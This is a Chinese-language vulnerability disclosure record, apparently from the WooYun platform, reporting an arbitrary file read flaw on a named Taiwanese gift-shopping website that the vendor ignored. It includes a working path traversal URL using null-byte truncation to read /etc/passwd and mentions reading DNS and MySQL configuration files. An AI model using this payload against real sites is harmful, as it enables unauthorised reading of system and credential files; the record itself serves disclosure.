漏洞概要
关注数(24)
关注此漏洞
漏洞标题:万事OK WWW主站任意文件遍历读取漏洞(臺灣地區)
漏洞作者: 暴走
提交时间:2016-02-22 09:48
修复时间:2016-02-27 09:50
公开时间:2016-02-27 09:50
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2016-02-22: 细节已通知厂商并且等待厂商处理中
2016-02-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
在网站上看到的简介:
名傑國際「萬事OK」為國內知名電子商務公司─安瑟數位之關係企業。安瑟自1998年起即開始電子商務經營,執國內電子購物網站之牛耳,並多次獲獎,深受消費者肯定。為提供消費者一個舒適便利的-禮品-名產 特產購物環境,特成立「萬事OK」網站 (http://www.onceok.com.tw)。有了「萬事OK」,買淡水最道地的魚酥,不用搭捷運跑淡水,購買全台各地名產特產,也不用搭高鐵就讓您輕鬆吃遍全台灣。點一下「萬事OK」,萬事都OK。
萬事OK有別於其他購物網站只是將商品PO到網路上就開始販售。萬事OK以安瑟八年來經營電子商務的經驗,協助精選出來的全台各地-禮品-名產 特產 之名店將商品及店家資訊等完整 E化,並計劃將全台各地名產特產及無遠弗屆的電子商務平台銷售到全世界去。所以萬事OK是您挑選-禮品-贈品-、伴手禮的最佳選擇。
详细说明:
万事OK主站(http://www.onceok.com.tw/)首页:
漏洞证明:
经过测试发现存在任意文件读取漏洞。
使用%00截断即可读取系统文件:
http://www.onceok.com.tw/activities.php?ad=../../../../../../../../../etc/passwd%00.jpg
查看DNS:
查看下MySQL的配置文件:
修复方案:
版权声明:转载请注明来源 暴走@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-02-27 09:50
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无
漏洞评价:
评价